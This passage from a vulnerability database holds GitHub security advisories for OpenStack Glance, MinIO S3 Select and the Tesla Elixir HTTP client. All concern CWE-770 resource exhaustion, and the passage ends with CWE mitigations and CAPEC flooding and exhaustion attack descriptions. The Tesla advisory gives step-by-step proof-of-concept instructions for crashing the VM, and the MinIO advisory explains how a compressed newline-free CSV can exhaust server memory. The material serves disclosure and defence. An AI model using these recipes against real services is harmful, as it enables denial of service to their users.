"aliases": [
"CVE-2014-9684"
],
"database_specific": {
"cwe_ids": [
"CWE-770"
],
"github_reviewed": true,
"github_reviewed_at": "2024-05-14T21:32:19Z",
"nvd_published_at": "2015-02-24T15:59:00Z",
"severity": "HIGH"
},
"details": "OpenStack Image Registry and Delivery Service (Glance) 2014.2 through 2014.2.2 does not properly remove images, which allows remote authenticated users to cause a denial of service (disk consumption) by creating a large number of images using the task v2 API and then deleting them before the uploads finish, a different vulnerability than CVE-2015-1881.",
"id": "GHSA-h737-q6g6-8wr6",
"modified": "2024-11-26T18:25:27Z",
"published": "2022-05-17T03:10:45Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2014-9684"
},
{
"type": "WEB",
"url": "https://github.com/openstack/glance/commit/7858d4d95154c8596720365e465cca7858cfec5c"
},
{
"type": "WEB",
"url": "https://github.com/openstack/glance/commit/a880c8e762e94b70c1e5d5692a3defcde734a601"
},
{
"type": "WEB",
"url": "https://bugs.launchpad.net/glance/+bug/1371118"
},
{
"type": "PACKAGE",
"url": "https://github.com/openstack/glance"
},
{
"type": "WEB",
"url": "https://github.com/pypa/advisory-database/tree/main/vulns/glance/PYSEC-2015-37.yaml"
},
{
"type": "WEB",
"url": "http://lists.openstack.org/pipermail/openstack-announce/2015-February/000336.html"
},
{
"type": "WEB",
"url": "http://rhn.redhat.com/errata/RHSA-2015-0938.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "OpenStack Glance Denial of service by creating a large number of images"
}
GHSA-H749-FXX7-PWPG
Vulnerability from github – Published: 2026-04-09 17:32 – Updated: 2026-04-09 17:32Impact
What kind of vulnerability is it? Who is impacted?
MinIO's S3 Select feature is vulnerable to memory exhaustion when processing CSV
files containing lines longer than available memory. The CSV reader's nextSplit()
function calls bufio.Reader.ReadBytes('\n') with no size limit, buffering the entire
input in memory until a newline is found. A CSV file with no newline characters
causes the entire contents to be read into a single allocation, leading to an OOM
crash of the MinIO server process.
This is exploitable by any authenticated user with s3:PutObject and s3:GetObject
permissions. The attack is especially practical when combined with compression:
a ~2 MB gzip-compressed CSV can decompress to gigabytes of data without
newlines, allowing a small upload to cause large memory consumption on
the server. However, compression is not required — a sufficiently large uncompressed
CSV with no newlines triggers the same issue.
Affected component: internal/s3select/csv/reader.go, function
nextSplit().
CWE: CWE-770 (Allocation of Resources Without Limits or Throttling)
Affected Versions
All MinIO releases are through the final release of the minio/minio open-source project.
The vulnerability was introduced in commit https://github.com/minio/minio/commit/7c14cdb60e53dbfdad2be644dfb180cab19fffa7, which added S3 Select support for CSV.
The CSV reader has used unbounded line reads since this commit (originally via
Go's stdlib encoding/csv.Reader, later via bufio.Reader.ReadBytes after a refactor
in PR #8200.
The first affected release is RELEASE.2018-08-18T03-49-57Z.
Patches
Fixed in: MinIO AIStor RELEASE.2025-12-20T04-58-37Z
The fix replaces the unbounded bufio.Reader.ReadBytes('\n') call with a
byte-at-a-time loop that caps line scanning at 128 KB (csvSplitSize). If no
newline is found within this limit, the reader returns an error instead of
continuing to buffer.
Binary Downloads
| Platform | Architecture | Download |
|---|---|---|
| Linux | amd64 | minio |
| Linux | arm64 | minio |
| macOS | arm64 | minio |
| macOS | amd64 | minio |
| Windows | amd64 | minio.exe |
FIPS Binaries
| Platform | Architecture | Download |
|---|---|---|
| Linux | amd64 | minio.fips |
| Linux | arm64 | minio.fips |
Package Downloads
| Format | Architecture | Download |
|---|---|---|
| DEB | amd64 | minio_20251220045837.0.0_amd64.deb |
| DEB | arm64 | minio_20251220045837.0.0_arm64.deb |
| RPM | amd64 | minio-20251220045837.0.0-1.x86_64.rpm |
| RPM | arm64 | minio-20251220045837.0.0-1.aarch64.rpm |
Container Images
# Standard
docker pull quay.io/minio/aistor/minio:RELEASE.2025-12-20T04-58-37Z
podman pull quay.io/minio/aistor/minio:RELEASE.2025-12-20T04-58-37Z
# FIPS
docker pull quay.io/minio/aistor/minio:RELEASE.2025-12-20T04-58-37Z.fips
podman pull quay.io/minio/aistor/minio:RELEASE.2025-12-20T04-58-37Z.fips
Homebrew (macOS)
brew install minio/aistor/minio
Workarounds
If upgrading is not immediately possible:
-
Disable S3 Select access via IAM policy. Deny the
s3:GetObjectaction with a condition restrictings3:prefixon sensitive buckets, or more specifically, denySelectObjectContentrequests at a reverse proxy by blockingPOSTrequests with?select&select-type=2query parameters. -
Restrict PutObject permissions. Limit
s3:PutObjectgrants to trusted principals to reduce the attack surface. Note: this reduces risk but does not eliminate the vulnerability since any authorized user can exploit it.
References
- Introducing commit:
7c14cdb60(PR #6127) - MinIO AIStor
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/minio/minio"
},
"ranges": [
{
"events": [
{
"introduced": "0.0.0-20180815103019-7c14cdb60e53"
},
{
"last_affected": "0.0.0-20251203081239-27742d469462"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-39414"
],
"database_specific": {
"cwe_ids": [
"CWE-770"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-09T17:32:31Z",
"nvd_published_at": "2026-04-08T21:16:58Z",
"severity": "HIGH"
},
"details": "### Impact\n\n_What kind of vulnerability is it? Who is impacted?_\n\nMinIO\u0027s S3 Select feature is vulnerable to memory exhaustion when processing CSV \nfiles containing lines longer than available memory. The CSV reader\u0027s `nextSplit()` \nfunction calls `bufio.Reader.ReadBytes(\u0027\\n\u0027)` with no size limit, buffering the entire \ninput in memory until a newline is found. A CSV file with no newline characters \ncauses the entire contents to be read into a single allocation, leading to an OOM\ncrash of the MinIO server process.\n\nThis is exploitable by any authenticated user with `s3:PutObject` and `s3:GetObject` \npermissions. The attack is especially practical when combined with compression: \na ~2 MB gzip-compressed CSV can decompress to gigabytes of data without \nnewlines, allowing a small upload to cause large memory consumption on \nthe server. However, compression is not required \u2014 a sufficiently large uncompressed \nCSV with no newlines triggers the same issue.\n\n**Affected component:** `internal/s3select/csv/reader.go`, function\n`nextSplit()`.\n\n**CWE:** CWE-770 (Allocation of Resources Without Limits or Throttling)\n\n### Affected Versions\n\nAll MinIO releases are through the final release of the minio/minio open-source project.\n\nThe vulnerability was introduced in commit https://github.com/minio/minio/commit/7c14cdb60e53dbfdad2be644dfb180cab19fffa7, which added S3 Select support for CSV. \nThe CSV reader has used unbounded line reads since this commit (originally via \nGo\u0027s stdlib `encoding/csv.Reader`, later via `bufio.Reader.ReadBytes` after a refactor \nin [PR #8200](https://github.com/minio/minio/pull/8200). \n\nThe first affected release is `RELEASE.2018-08-18T03-49-57Z`.\n\n### Patches\n\n**Fixed in**: MinIO AIStor RELEASE.2025-12-20T04-58-37Z\n\nThe fix replaces the unbounded `bufio.Reader.ReadBytes(\u0027\\n\u0027)` call with a\nbyte-at-a-time loop that caps line scanning at 128 KB (`csvSplitSize`). If no\nnewline is found within this limit, the reader returns an error instead of\ncontinuing to buffer.\n\n#### Binary Downloads\n\n| Platform | Architecture | Download |\n| -------- | ------------ | --------------------------------------------------------------------------- |\n| Linux | amd64 | [minio](https://dl.min.io/aistor/minio/release/linux-amd64/minio) |\n| Linux | arm64 | [minio](https://dl.min.io/aistor/minio/release/linux-arm64/minio) |\n| macOS | arm64 | [minio](https://dl.min.io/aistor/minio/release/darwin-arm64/minio) |\n| macOS | amd64 | [minio](https://dl.min.io/aistor/minio/release/darwin-amd64/minio) |\n| Windows | amd64 | [minio.exe](https://dl.min.io/aistor/minio/release/windows-amd64/minio.exe) |\n\n#### FIPS Binaries\n\n| Platform | Architecture | Download |\n| -------- | ------------ | --------------------------------------------------------------------------- |\n| Linux | amd64 | [minio.fips](https://dl.min.io/aistor/minio/release/linux-amd64/minio.fips) |\n| Linux | arm64 | [minio.fips](https://dl.min.io/aistor/minio/release/linux-arm64/minio.fips) |\n\n#### Package Downloads\n\n| Format | Architecture | Download |\n| ------ | ------------ | ----------------------------------------------------------------------------------------------------------------------------------- |\n| DEB | amd64 | [minio_20251220045837.0.0_amd64.deb](https://dl.min.io/aistor/minio/release/linux-amd64/minio_20251220045837.0.0_amd64.deb) |\n| DEB | arm64 | [minio_20251220045837.0.0_arm64.deb](https://dl.min.io/aistor/minio/release/linux-arm64/minio_20251220045837.0.0_arm64.deb) |\n| RPM | amd64 | [minio-20251220045837.0.0-1.x86_64.rpm](https://dl.min.io/aistor/minio/release/linux-amd64/minio-20251220045837.0.0-1.x86_64.rpm) |\n| RPM | arm64 | [minio-20251220045837.0.0-1.aarch64.rpm](https://dl.min.io/aistor/minio/release/linux-arm64/minio-20251220045837.0.0-1.aarch64.rpm) |\n\n#### Container Images\n\n```bash\n# Standard\ndocker pull quay.io/minio/aistor/minio:RELEASE.2025-12-20T04-58-37Z\npodman pull quay.io/minio/aistor/minio:RELEASE.2025-12-20T04-58-37Z\n\n# FIPS\ndocker pull quay.io/minio/aistor/minio:RELEASE.2025-12-20T04-58-37Z.fips\npodman pull quay.io/minio/aistor/minio:RELEASE.2025-12-20T04-58-37Z.fips\n```\n\n#### Homebrew (macOS)\n\n```bash\nbrew install minio/aistor/minio\n```\n\n### Workarounds\n\n- [Users of the open-source `minio/minio` project should upgrade to MinIO AIStor `RELEASE.2025-12-20T04-58-37Z` or later.](https://docs.min.io/enterprise/aistor-object-store/upgrade-aistor-server/community-edition/)\n\nIf upgrading is not immediately possible:\n\n- **Disable S3 Select access via IAM policy.** Deny the `s3:GetObject` action\n with a condition restricting `s3:prefix` on sensitive buckets, or more\n specifically, deny `SelectObjectContent` requests at a reverse proxy by\n blocking `POST` requests with `?select\u0026select-type=2` query parameters.\n\n- **Restrict PutObject permissions.** Limit `s3:PutObject` grants to trusted\n principals to reduce the attack surface. Note: this reduces risk but does not\n eliminate the vulnerability since any authorized user can exploit it.\n\n### References\n\n- Introducing commit: [`7c14cdb60`](https://github.com/minio/minio/commit/7c14cdb60e53dbfdad2be644dfb180cab19fffa7) ([PR #6127](https://github.com/minio/minio/pull/6127))\n- [MinIO AIStor](https://min.io/aistor)",
"id": "GHSA-h749-fxx7-pwpg",
"modified": "2026-04-09T17:32:31Z",
"published": "2026-04-09T17:32:31Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/minio/minio/security/advisories/GHSA-h749-fxx7-pwpg"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39414"
},
{
"type": "WEB",
"url": "https://github.com/minio/minio/pull/8200"
},
{
"type": "WEB",
"url": "https://github.com/minio/minio/commit/7c14cdb60e53dbfdad2be644dfb180cab19fffa7"
},
{
"type": "WEB",
"url": "https://docs.min.io/enterprise/aistor-object-store/upgrade-aistor-server/community-edition"
},
{
"type": "PACKAGE",
"url": "https://github.com/minio/minio"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "MinIO affected a DoS via Unbounded Memory Allocation in S3 Select CSV Parsing"
}
GHSA-H74C-Q9J7-MPCM
Vulnerability from github – Published: 2026-07-10 00:03 – Updated: 2026-07-10 00:03Summary
In the Mint adapter for the Tesla HTTP client library, Tesla.Adapter.Mint.open_conn/2 passes the URL scheme of every outgoing request through String.to_atom/1 with no allow-list validation. Because BEAM atoms are permanent (never garbage-collected) and the atom table is bounded at roughly 1,048,576 entries, an attacker who can vary the URL scheme across requests can mint one fresh atom per request and eventually exhaust the table, crashing the VM.
Details
Vulnerable call (lib/tesla/adapter/mint.ex, open_conn/2): the scheme field parsed from the request URI is passed directly to String.to_atom/1 before being forwarded to Mint.HTTP.connect/4. Even though Mint raises for unrecognised schemes, the atom is already interned by that point. The function's HTTPS-branch guard confirms that no scheme normalisation occurs beforehand.
The attack surface has two entry points. First, any application-level URL-forwarding feature (webhook relay, link preview, SSRF-style proxy) where untrusted input reaches Tesla.get/2 or equivalent. Second, any pipeline that includes Tesla.Middleware.FollowRedirects: a server under the attacker's control can return a Location header with a novel scheme, triggering the atom creation on the redirect follow.
PoC
- Stand up any application that accepts a user-supplied URL and forwards it through
Tesla.Adapter.Mint. - Send requests to the application, each with a distinct, previously unseen URL scheme (e.g.
atk1://,atk2://, ...). - Each request interns one new permanent atom;
Mintrejects the connection but the atom persists. - After approximately 1,000,000 requests the BEAM atom table is exhausted and the VM crashes.
Impact
High severity (CVSS v4.0: 8.2). Any application using tesla 1.3.0 through 1.18.2 with Tesla.Adapter.Mint that allows untrusted input to influence request URLs is vulnerable to remote denial of service. No authentication or special privileges are required beyond access to the application's HTTP endpoint. Fixed in tesla 1.18.3.
Configurations
The application must use Tesla.Adapter.Mint and either expose a feature that forwards attacker-controlled URLs to Tesla, or include Tesla.Middleware.FollowRedirects in the middleware pipeline.
References
- Introduction commit: https://github.com/elixir-tesla/tesla/commit/ccd0823d4ba37581a37d8f6108f9a81b263237ef
- Patch commit: https://github.com/elixir-tesla/tesla/commit/4699c3cb3e2fd6078f99f45f11cf7466aeedbf0e
{
"affected": [
{
"package": {
"ecosystem": "Hex",
"name": "tesla"
},
"ranges": [
{
"events": [
{
"introduced": "1.3.0"
},
{
"fixed": "1.18.3"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-48597"
],
"database_specific": {
"cwe_ids": [
"CWE-770"
],
"github_reviewed": true,
"github_reviewed_at": "2026-07-10T00:03:51Z",
"nvd_published_at": "2026-06-02T20:16:38Z",
"severity": "HIGH"
},
"details": "### Summary\n\nIn the Mint adapter for the Tesla HTTP client library, `Tesla.Adapter.Mint.open_conn/2` passes the URL scheme of every outgoing request through `String.to_atom/1` with no allow-list validation. Because BEAM atoms are permanent (never garbage-collected) and the atom table is bounded at roughly 1,048,576 entries, an attacker who can vary the URL scheme across requests can mint one fresh atom per request and eventually exhaust the table, crashing the VM.\n\n### Details\n\n**Vulnerable call** (`lib/tesla/adapter/mint.ex`, `open_conn/2`): the scheme field parsed from the request URI is passed directly to `String.to_atom/1` before being forwarded to `Mint.HTTP.connect/4`. Even though `Mint` raises for unrecognised schemes, the atom is already interned by that point. The function\u0027s HTTPS-branch guard confirms that no scheme normalisation occurs beforehand.\n\nThe attack surface has two entry points. First, any application-level URL-forwarding feature (webhook relay, link preview, SSRF-style proxy) where untrusted input reaches `Tesla.get/2` or equivalent. Second, any pipeline that includes `Tesla.Middleware.FollowRedirects`: a server under the attacker\u0027s control can return a `Location` header with a novel scheme, triggering the atom creation on the redirect follow.\n\n### PoC\n\n1. Stand up any application that accepts a user-supplied URL and forwards it through `Tesla.Adapter.Mint`.\n2. Send requests to the application, each with a distinct, previously unseen URL scheme (e.g. `atk1://`, `atk2://`, ...).\n3. Each request interns one new permanent atom; `Mint` rejects the connection but the atom persists.\n4. After approximately 1,000,000 requests the BEAM atom table is exhausted and the VM crashes.\n\n### Impact\n\nHigh severity (CVSS v4.0: 8.2). Any application using `tesla` 1.3.0 through 1.18.2 with `Tesla.Adapter.Mint` that allows untrusted input to influence request URLs is vulnerable to remote denial of service. No authentication or special privileges are required beyond access to the application\u0027s HTTP endpoint. Fixed in tesla 1.18.3.\n\n### Configurations\n\nThe application must use `Tesla.Adapter.Mint` and either expose a feature that forwards attacker-controlled URLs to Tesla, or include `Tesla.Middleware.FollowRedirects` in the middleware pipeline.\n\n### References\n\n* Introduction commit: https://github.com/elixir-tesla/tesla/commit/ccd0823d4ba37581a37d8f6108f9a81b263237ef\n* Patch commit: https://github.com/elixir-tesla/tesla/commit/4699c3cb3e2fd6078f99f45f11cf7466aeedbf0e",
"id": "GHSA-h74c-q9j7-mpcm",
"modified": "2026-07-10T00:03:51Z",
"published": "2026-07-10T00:03:51Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/elixir-tesla/tesla/security/advisories/GHSA-h74c-q9j7-mpcm"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-48597"
},
{
"type": "WEB",
"url": "https://github.com/elixir-tesla/tesla/commit/4699c3cb3e2fd6078f99f45f11cf7466aeedbf0e"
},
{
"type": "WEB",
"url": "https://cna.erlef.org/cves/CVE-2026-48597.html"
},
{
"type": "PACKAGE",
"url": "https://github.com/elixir-tesla/tesla"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/EEF-CVE-2026-48597"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "Tesla vulnerable to atom exhaustion via untrusted URL scheme"
}
Mitigation
Clearly specify the minimum and maximum expectations for capabilities, and dictate which behaviors are acceptable when resource allocation reaches limits.
Mitigation
Limit the amount of resources that are accessible to unprivileged users. Set per-user limits for resources. Allow the system administrator to define these limits. Be careful to avoid CWE-410.
Mitigation
Design throttling mechanisms into the system architecture. The best protection is to limit the amount of resources that an unauthorized user can cause to be expended. A strong authentication and access control model will help prevent such attacks from occurring in the first place, and it will help the administrator to identify who is committing the abuse. The login application should be protected against DoS attacks as much as possible. Limiting the database access, perhaps by caching result sets, can help minimize the resources expended. To further limit the potential for a DoS attack, consider tracking the rate of requests received from users and blocking requests that exceed a defined rate threshold.
Mitigation MIT-5
Strategy: Input Validation
- Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.
- When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue."
- Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.
Mitigation MIT-15
For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.
Mitigation
- Mitigation of resource exhaustion attacks requires that the target system either:
- The first of these solutions is an issue in itself though, since it may allow attackers to prevent the use of the system by a particular valid user. If the attacker impersonates the valid user, they may be able to prevent the user from accessing the server in question.
- The second solution can be difficult to effectively institute -- and even when properly done, it does not provide a full solution. It simply requires more resources on the part of the attacker.
- recognizes the attack and denies that user further access for a given amount of time, typically by using increasing time delays
- uniformly throttles all requests in order to make it more difficult to consume resources more quickly than they can again be freed.
Mitigation
Ensure that protocols have specific limits of scale placed on them.
Mitigation MIT-38.1
- If the program must fail, ensure that it fails gracefully (fails closed). There may be a temptation to simply let the program fail poorly in cases such as low memory conditions, but an attacker may be able to assert control before the software has fully exited. Alternately, an uncontrolled failure could cause cascading problems with other downstream components; for example, the program could send a signal to a downstream process so the process immediately knows that a problem has occurred and has a better chance of recovery.
- Ensure that all failures in resource allocation place the system into a safe posture.
Mitigation MIT-47
Strategy: Resource Limitation
- Use quotas or other resource-limiting settings provided by the operating system or environment. For example, when managing system resources in POSIX, setrlimit() can be used to set limits for certain types of resources, and getrlimit() can determine how many resources are available. However, these functions are not available on all operating systems.
- When the current levels get close to the maximum that is defined for the application (see CWE-770), then limit the allocation of further resources to privileged users; alternately, begin releasing resources for less-privileged users. While this mitigation may protect the system from attack, it will not necessarily stop attackers from adversely impacting other users.
- Ensure that the application performs the appropriate error checks and error handling in case resources become unavailable (CWE-703).
CAPEC-125: Flooding
An adversary consumes the resources of a target by rapidly engaging in a large number of interactions with the target. This type of attack generally exposes a weakness in rate limiting or flow. When successful this attack prevents legitimate users from accessing the service and can cause the target to crash. This attack differs from resource depletion through leaks or allocations in that the latter attacks do not rely on the volume of requests made to the target but instead focus on manipulation of the target's operations. The key factor in a flooding attack is the number of requests the adversary can make in a given period of time. The greater this number, the more likely an attack is to succeed against a given target.
CAPEC-130: Excessive Allocation
An adversary causes the target to allocate excessive resources to servicing the attackers' request, thereby reducing the resources available for legitimate services and degrading or denying services. Usually, this attack focuses on memory allocation, but any finite resource on the target could be the attacked, including bandwidth, processing cycles, or other resources. This attack does not attempt to force this allocation through a large number of requests (that would be Resource Depletion through Flooding) but instead uses one or a small number of requests that are carefully formatted to force the target to allocate excessive resources to service this request(s). Often this attack takes advantage of a bug in the target to cause the target to allocate resources vastly beyond what would be needed for a normal request.
CAPEC-147: XML Ping of the Death
An attacker initiates a resource depletion attack where a large number of small XML messages are delivered at a sufficiently rapid rate to cause a denial of service or crash of the target. Transactions such as repetitive SOAP transactions can deplete resources faster than a simple flooding attack because of the additional resources used by the SOAP protocol and the resources necessary to process SOAP messages. The transactions used are immaterial as long as they cause resource utilization on the target. In other words, this is a normal flooding attack augmented by using messages that will require extra processing on the target.
CAPEC-197: Exponential Data Expansion
An adversary submits data to a target application which contains nested exponential data expansion to produce excessively large output. Many data format languages allow the definition of macro-like structures that can be used to simplify the creation of complex structures. However, this capability can be abused to create excessive demands on a processor's CPU and memory. A small number of nested expansions can result in an exponential growth in demands on memory.
CAPEC-229: Serialized Data Parameter Blowup
This attack exploits certain serialized data parsers (e.g., XML, YAML, etc.) which manage data in an inefficient manner. The attacker crafts an serialized data file with multiple configuration parameters in the same dataset. In a vulnerable parser, this results in a denial of service condition where CPU resources are exhausted because of the parsing algorithm. The weakness being exploited is tied to parser implementation and not language specific.
CAPEC-230: Serialized Data with Nested Payloads
Applications often need to transform data in and out of a data format (e.g., XML and YAML) by using a parser. It may be possible for an adversary to inject data that may have an adverse effect on the parser when it is being processed. Many data format languages allow the definition of macro-like structures that can be used to simplify the creation of complex structures. By nesting these structures, causing the data to be repeatedly substituted, an adversary can cause the parser to consume more resources while processing, causing excessive memory consumption and CPU utilization.
CAPEC-231: Oversized Serialized Data Payloads
An adversary injects oversized serialized data payloads into a parser during data processing to produce adverse effects upon the parser such as exhausting system resources and arbitrary code execution.
CAPEC-469: HTTP DoS
An attacker performs flooding at the HTTP level to bring down only a particular web application rather than anything listening on a TCP/IP connection. This denial of service attack requires substantially fewer packets to be sent which makes DoS harder to detect. This is an equivalent of SYN flood in HTTP. The idea is to keep the HTTP session alive indefinitely and then repeat that hundreds of times. This attack targets resource depletion weaknesses in web server software. The web server will wait to attacker's responses on the initiated HTTP sessions while the connection threads are being exhausted.
CAPEC-482: TCP Flood
An adversary may execute a flooding attack using the TCP protocol with the intent to deny legitimate users access to a service. These attacks exploit the weakness within the TCP protocol where there is some state information for the connection the server needs to maintain. This often involves the use of TCP SYN messages.
CAPEC-486: UDP Flood
An adversary may execute a flooding attack using the UDP protocol with the intent to deny legitimate users access to a service by consuming the available network bandwidth. Additionally, firewalls often open a port for each UDP connection destined for a service with an open UDP port, meaning the firewalls in essence save the connection state thus the high packet nature of a UDP flood can also overwhelm resources allocated to the firewall. UDP attacks can also target services like DNS or VoIP which utilize these protocols. Additionally, due to the session-less nature of the UDP protocol, the source of a packet is easily spoofed making it difficult to find the source of the attack.
CAPEC-487: ICMP Flood
An adversary may execute a flooding attack using the ICMP protocol with the intent to deny legitimate users access to a service by consuming the available network bandwidth. A typical attack involves a victim server receiving ICMP packets at a high rate from a wide range of source addresses. Additionally, due to the session-less nature of the ICMP protocol, the source of a packet is easily spoofed making it difficult to find the source of the attack.
CAPEC-488: HTTP Flood
An adversary may execute a flooding attack using the HTTP protocol with the intent to deny legitimate users access to a service by consuming resources at the application layer such as web services and their infrastructure. These attacks use legitimate session-based HTTP GET requests designed to consume large amounts of a server's resources. Since these are legitimate sessions this attack is very difficult to detect.
CAPEC-489: SSL Flood
An adversary may execute a flooding attack using the SSL protocol with the intent to deny legitimate users access to a service by consuming all the available resources on the server side. These attacks take advantage of the asymmetric relationship between the processing power used by the client and the processing power used by the server to create a secure connection. In this manner the attacker can make a large number of HTTPS requests on a low provisioned machine to tie up a disproportionately large number of resources on the server. The clients then continue to keep renegotiating the SSL connection. When multiplied by a large number of attacking machines, this attack can result in a crash or loss of service to legitimate users.
CAPEC-490: Amplification
An adversary may execute an amplification where the size of a response is far greater than that of the request that generates it. The goal of this attack is to use a relatively few resources to create a large amount of traffic against a target server. To execute this attack, an adversary send a request to a 3rd party service, spoofing the source address to be that of the target server. The larger response that is generated by the 3rd party service is then sent to the target server. By sending a large number of initial requests, the adversary can generate a tremendous amount of traffic directed at the target. The greater the discrepancy in size between the initial request and the final payload delivered to the target increased the effectiveness of this attack.
CAPEC-491: Quadratic Data Expansion
An adversary exploits macro-like substitution to cause a denial of service situation due to excessive memory being allocated to fully expand the data. The result of this denial of service could cause the application to freeze or crash. This involves defining a very large entity and using it multiple times in a single entity substitution. CAPEC-197 is a similar attack pattern, but it is easier to discover and defend against. This attack pattern does not perform multi-level substitution and therefore does not obviously appear to consume extensive resources.
CAPEC-493: SOAP Array Blowup
An adversary may execute an attack on a web service that uses SOAP messages in communication. By sending a very large SOAP array declaration to the web service, the attacker forces the web service to allocate space for the array elements before they are parsed by the XML parser. The attacker message is typically small in size containing a large array declaration of say 1,000,000 elements and a couple of array elements. This attack targets exhaustion of the memory resources of the web service.
CAPEC-494: TCP Fragmentation
An adversary may execute a TCP Fragmentation attack against a target with the intention of avoiding filtering rules of network controls, by attempting to fragment the TCP packet such that the headers flag field is pushed into the second fragment which typically is not filtered.
CAPEC-495: UDP Fragmentation
An attacker may execute a UDP Fragmentation attack against a target server in an attempt to consume resources such as bandwidth and CPU. IP fragmentation occurs when an IP datagram is larger than the MTU of the route the datagram has to traverse. Typically the attacker will use large UDP packets over 1500 bytes of data which forces fragmentation as ethernet MTU is 1500 bytes. This attack is a variation on a typical UDP flood but it enables more network bandwidth to be consumed with fewer packets. Additionally it has the potential to consume server CPU resources and fill memory buffers associated with the processing and reassembling of fragmented packets.
CAPEC-496: ICMP Fragmentation
An attacker may execute a ICMP Fragmentation attack against a target with the intention of consuming resources or causing a crash. The attacker crafts a large number of identical fragmented IP packets containing a portion of a fragmented ICMP message. The attacker these sends these messages to a target host which causes the host to become non-responsive. Another vector may be sending a fragmented ICMP message to a target host with incorrect sizes in the header which causes the host to hang.
CAPEC-528: XML Flood
An adversary may execute a flooding attack using XML messages with the intent to deny legitimate users access to a web service. These attacks are accomplished by sending a large number of XML based requests and letting the service attempt to parse each one. In many cases this type of an attack will result in a XML Denial of Service (XDoS) due to an application becoming unstable, freezing, or crashing.